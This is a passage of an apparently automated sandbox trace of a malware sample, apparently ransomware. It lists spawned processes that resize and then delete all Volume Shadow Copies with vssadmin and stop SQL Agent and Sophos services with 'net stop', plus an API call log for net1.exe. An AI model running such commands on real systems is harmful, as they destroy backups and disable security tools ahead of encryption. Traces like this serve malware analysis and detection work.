= "0x493be000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 35 os_tid = 0xa1c Thread: id = 36 os_tid = 0xa20 Thread: id = 37 os_tid = 0xa28 Thread: id = 38 os_tid = 0xa2c Thread: id = 39 os_tid = 0xa30 Process: id = "8" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x489c3000" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 40 os_tid = 0xa3c Thread: id = 41 os_tid = 0xa40 Thread: id = 42 os_tid = 0xa44 Thread: id = 43 os_tid = 0xa48 Thread: id = 44 os_tid = 0xa4c Process: id = "9" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x486c8000" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0xa58 Thread: id = 46 os_tid = 0xa5c Thread: id = 47 os_tid = 0xa60 Thread: id = 48 os_tid = 0xa64 Thread: id = 49 os_tid = 0xa68 Process: id = "10" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x49fcd000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 50 os_tid = 0xa74 Thread: id = 51 os_tid = 0xa78 Thread: id = 52 os_tid = 0xa7c Thread: id = 53 os_tid = 0xa80 Thread: id = 54 os_tid = 0xa84 Process: id = "11" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x48ed2000" os_pid = "0xa8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0xa90 Thread: id = 56 os_tid = 0xa94 Thread: id = 57 os_tid = 0xa98 Thread: id = 58 os_tid = 0xa9c Thread: id = 59 os_tid = 0xaa0 Process: id = "12" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x491d7000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 60 os_tid = 0xaac Thread: id = 61 os_tid = 0xab0 Thread: id = 62 os_tid = 0xab4 Thread: id = 63 os_tid = 0xab8 Thread: id = 64 os_tid = 0xabc Process: id = "13" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x4a2dc000" os_pid = "0xac4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 65 os_tid = 0xac8 Thread: id = 66 os_tid = 0xacc Thread: id = 67 os_tid = 0xad0 Thread: id = 68 os_tid = 0xad4 Thread: id = 69 os_tid = 0xad8 Process: id = "14" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x49fe1000" os_pid = "0xae0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0xae4 Thread: id = 71 os_tid = 0xae8 Thread: id = 72 os_tid = 0xaec Thread: id = 73 os_tid = 0xaf0 Thread: id = 74 os_tid = 0xaf4 Process: id = "15" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x4a6e6000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 75 os_tid = 0xb00 Thread: id = 76 os_tid = 0xb04 Thread: id = 77 os_tid = 0xb08 Thread: id = 78 os_tid = 0xb0c Thread: id = 79 os_tid = 0xb10 Process: id = "16" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x4a4fa000" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "vssadmin Delete Shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 80 os_tid = 0xb1c Thread: id = 81 os_tid = 0xb20 Thread: id = 82 os_tid = 0xb24 Thread: id = 83 os_tid = 0xb28 Thread: id = 84 os_tid = 0xb2c Process: id = "17" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x24200000" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 85 os_tid = 0xb38 Process: id = "18" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x499ae000" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xb34" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 86 os_tid = 0xb40 [0037.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfa28 | out: lpSystemTimeAsFileTime=0xdfa28*(dwLowDateTime=0xe0737900, dwHighDateTime=0x1d57a86)) [0037.329] GetCurrentProcessId () returned 0xb3c [0037.329] GetCurrentThreadId () returned 0xb40 [0037.330] GetTickCount () returned 0x1144589 [0037.330] QueryPerformanceCounter (in: lpPerformanceCount=0xdfa20 | out: lpPerformanceCount=0xdfa20*=15761422080) returned 1 [0037.330] GetModuleHandleA (lpModuleName=0x0) returned 0x9f0000 [0037.330] __set_app_type (_Type=0x1) [0037.330] __p__fmode () returned 0x74eb31f4 [0037.330] __p__commode () returned 0x74eb31fc [0037.331] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9fffe6) returned 0x0 [0037.331] __getmainargs (in: _Argc=0xa09064, _Argv=0xa0906c, _Env=0xa09068, _DoWildCard=0, _StartInfo=0xa09024 | out: _Argc=0xa09064, _Argv=0xa0906c, _Env=0xa09068) returned 0 [0037.331] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0037.331] GetConsoleOutputCP () returned 0x1b5 [0037.331] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa09080 | out: lpCPInfo=0xa09080) returned 1 [0037.331] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.334] sprintf_s (in: _DstBuf=0xdf9e0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0037.335] setlocale (category=0, locale=".437") returned="English_United States.437" [0037.336] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0037.336] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0037.336] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SYSTEM_BGC /y" [0037.337] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdf7ac, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0037.337] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x7a) returned 0x593c20 [0037.337] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0037.337] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdf9b0 | out: Buffer=0xdf9b0*=0x591c80) returned 0x0 [0037.337] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdf9b0 | out: Buffer=0xdf9b0*=0x591c98) returned 0x0 [0037.337] _fileno (_File=0x74eb2900) returned -2 [0037.337] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0037.337] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0037.337] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0037.337] _wcsicmp (_String1="config", _String2="stop") returned -16 [0037.337] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0037.337] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0037.337] _wcsicmp (_String1="file", _String2="stop") returned -13 [0037.337] _wcsicmp (_String1="files", _String2="stop") returned -13 [0037.337] _wcsicmp (_String1="group", _String2="stop") returned -12 [0037.337] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0037.337] _wcsicmp (_String1="help", _String2="stop") returned -11 [0037.337] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0037.337] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0037.337] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0037.337] _wcsicmp (_String1="session", _String2="stop") returned -15 [0037.337] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0037.337] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0037.337] _wcsicmp (_String1="share", _String2="stop") returned -12 [0037.337] _wcsicmp (_String1="start", _String2="stop") returned -14 [0037.337] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0037.338] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0037.338] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0037.338] _wcsicmp (_String1="accounts", _String2="SQLAgent$SYSTEM_BGC") returned -18 [0037.338] _wcsicmp (_String1="computer", _String2="SQLAgent$SYSTEM_BGC") returned -16 [0037.338] _wcsicmp (_String1="config", _String2="SQLAgent$SYSTEM_BGC") returned -16 [0037.338] _wcsicmp (_String1="continue", _String2="SQLAgent$SYSTEM_BGC") returned -16 [0037.338] _wcsicmp (_String1="cont", _String2="SQLAgent$SYSTEM_BGC") returned -16 [0037.338] _wcsicmp (_String1="file", _String2="SQLAgent$SYSTEM_BGC") returned -13 [0037.338] _wcsicmp (_String1="files", _String2="SQLAgent$SYSTEM_BGC") returned -13 [0037.338] _wcsicmp (_String1="group", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0037.338] _wcsicmp (_String1="groups", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0037.338] _wcsicmp (_String1="help", _String2="SQLAgent$SYSTEM_BGC") returned -11 [0037.338] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SYSTEM_BGC") returned -11 [0037.338] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SYSTEM_BGC") returned -7 [0037.338] _wcsicmp (_String1="pause", _String2="SQLAgent$SYSTEM_BGC") returned -3 [0037.338] _wcsicmp (_String1="session", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0037.338] _wcsicmp (_String1="sessions", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0037.338] _wcsicmp (_String1="sess", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0037.338] _wcsicmp (_String1="share", _String2="SQLAgent$SYSTEM_BGC") returned -9 [0037.338] _wcsicmp (_String1="start", _String2="SQLAgent$SYSTEM_BGC") returned 3 [0037.338] _wcsicmp (_String1="stats", _String2="SQLAgent$SYSTEM_BGC") returned 3 [0037.338] _wcsicmp (_String1="statistics", _String2="SQLAgent$SYSTEM_BGC") returned 3 [0037.338] _wcsicmp (_String1="stop", _String2="SQLAgent$SYSTEM_BGC") returned 3 [0037.338] _wcsicmp (_String1="time", _String2="SQLAgent$SYSTEM_BGC") returned 1 [0037.338] _wcsicmp (_String1="user", _String2="SQLAgent$SYSTEM_BGC") returned 2 [0037.338] _wcsicmp (_String1="users", _String2="SQLAgent$SYSTEM_BGC") returned 2 [0037.338] _wcsicmp (_String1="msg", _String2="SQLAgent$SYSTEM_BGC") returned -6 [0037.338] _wcsicmp (_String1="messenger", _String2="SQLAgent$SYSTEM_BGC") returned -6 [0037.338] _wcsicmp (_String1="receiver", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0037.338] _wcsicmp (_String1="rcv", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0037.338] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SYSTEM_BGC") returned -5 [0037.338] _wcsicmp (_String1="redirector", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0037.338] _wcsicmp (_String1="redir", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0037.338] _wcsicmp (_String1="rdr", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0037.338] _wcsicmp (_String1="workstation", _String2="SQLAgent$SYSTEM_BGC") returned 4 [0037.338] _wcsicmp (_String1="work", _String2="SQLAgent$SYSTEM_BGC") returned 4 [0037.338] _wcsicmp (_String1="wksta", _String2="SQLAgent$SYSTEM_BGC") returned 4 [0037.338] _wcsicmp (_String1="prdr", _String2="SQLAgent$SYSTEM_BGC") returned -3 [0037.338] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SYSTEM_BGC") returned -15 [0037.339] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SYSTEM_BGC") returned -7 [0037.339] _wcsicmp (_String1="server", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0037.339] _wcsicmp (_String1="svr", _String2="SQLAgent$SYSTEM_BGC") returned 5 [0037.339] _wcsicmp (_String1="srv", _String2="SQLAgent$SYSTEM_BGC") returned 1 [0037.339] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SYSTEM_BGC") returned -7 [0037.339] _wcsicmp (_String1="alerter", _String2="SQLAgent$SYSTEM_BGC") returned -18 [0037.339] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SYSTEM_BGC") returned -5 [0037.339] _wcsupr (in: _String="SQLAgent$SYSTEM_BGC" | out: _String="SQLAGENT$SYSTEM_BGC") returned="SQLAGENT$SYSTEM_BGC" [0037.340] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5954f0 [0037.343] GetServiceKeyNameW (in: hSCManager=0x5954f0, lpDisplayName="SQLAGENT$SYSTEM_BGC", lpServiceName=0xa0aaf0, lpcchBuffer=0xdf94c | out: lpServiceName="", lpcchBuffer=0xdf94c) returned 0 [0037.346] _wcsicmp (_String1="msg", _String2="SQLAGENT$SYSTEM_BGC") returned -6 [0037.346] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SYSTEM_BGC") returned -6 [0037.346] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0037.346] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0037.346] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0037.346] _wcsicmp (_String1="redir", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0037.346] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0037.346] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SYSTEM_BGC") returned 4 [0037.346] _wcsicmp (_String1="work", _String2="SQLAGENT$SYSTEM_BGC") returned 4 [0037.346] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SYSTEM_BGC") returned 4 [0037.346] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SYSTEM_BGC") returned -3 [0037.346] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SYSTEM_BGC") returned -15 [0037.346] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SYSTEM_BGC") returned -7 [0037.346] _wcsicmp (_String1="server", _String2="SQLAGENT$SYSTEM_BGC") returned -12 [0037.346] _wcsicmp (_String1="svr", _String2="SQLAGENT$SYSTEM_BGC") returned 5 [0037.346] _wcsicmp (_String1="srv", _String2="SQLAGENT$SYSTEM_BGC") returned 1 [0037.346] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SYSTEM_BGC") returned -7 [0037.346] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SYSTEM_BGC") returned -18 [0037.346] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SYSTEM_BGC") returned -5 [0037.346] NetServiceControl (in: servername=0x0, service="SQLAGENT$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0xdf948 | out: bufptr=0xdf948) returned 0x889 [0037.347] wcscpy_s (in: _Destination=0xa0a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0037.347] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0037.353] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xa0b338, nSize=0x800, Arguments=0xa09dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0037.354] GetFileType (hFile=0x26c) returned 0x3 [0037.354] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x594020 [0037.354] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x594020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nX", lpUsedDefaultChar=0x0) returned 30 [0037.354] WriteFile (in: hFile=0x26c, lpBuffer=0x594020*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xdf888, lpOverlapped=0x0 | out: lpBuffer=0x594020*, lpNumberOfBytesWritten=0xdf888*=0x1e, lpOverlapped=0x0) returned 1 [0037.354] LocalFree (hMem=0x594020) returned 0x0 [0037.355] GetFileType (hFile=0x26c) returned 0x3 [0037.355] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5962c8 [0037.355] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5962c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nY", lpUsedDefaultChar=0x0) returned 2 [0037.355] WriteFile (in: hFile=0x26c, lpBuffer=0x5962c8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf888, lpOverlapped=0x0 | out: lpBuffer=0x5962c8*, lpNumberOfBytesWritten=0xdf888*=0x2, lpOverlapped=0x0) returned 1 [0037.355] LocalFree (hMem=0x5962c8) returned 0x0 [0037.355] _ultow (in: _Dest=0x889, _Radix=915640 | out: _Dest=0x889) returned="2185" [0037.355] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xa0b338, nSize=0x800, Arguments=0xa09dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0037.355] GetFileType (hFile=0x26c) returned 0x3 [0037.355] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5962c8 [0037.355] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5962c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0037.355] WriteFile (in: hFile=0x26c, lpBuffer=0x5962c8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xdf894, lpOverlapped=0x0 | out: lpBuffer=0x5962c8*, lpNumberOfBytesWritten=0xdf894*=0x34, lpOverlapped=0x0) returned 1 [0037.355] LocalFree (hMem=0x5962c8) returned 0x0 [0037.355] GetFileType (hFile=0x26c) returned 0x3 [0037.355] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5962c8 [0037.355] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5962c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nY", lpUsedDefaultChar=0x0) returned 2 [0037.355] WriteFile (in: hFile=0x26c, lpBuffer=0x5962c8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf894, lpOverlapped=0x0 | out: lpBuffer=0x5962c8*, lpNumberOfBytesWritten=0xdf894*=0x2, lpOverlapped=0x0) returned 1 [0037.355] LocalFree (hMem=0x5962c8) returned 0x0 [0037.356] NetApiBufferFree (Buffer=0x591c80) returned 0x0 [0037.356] NetApiBufferFree (Buffer=0x591c98) returned 0x0 [0037.356] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SYSTEM_BGC /y" [0037.356] exit (_Code=2) Process: id = "19" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x49e05000" os_pid = "0xb44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos Device Control ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 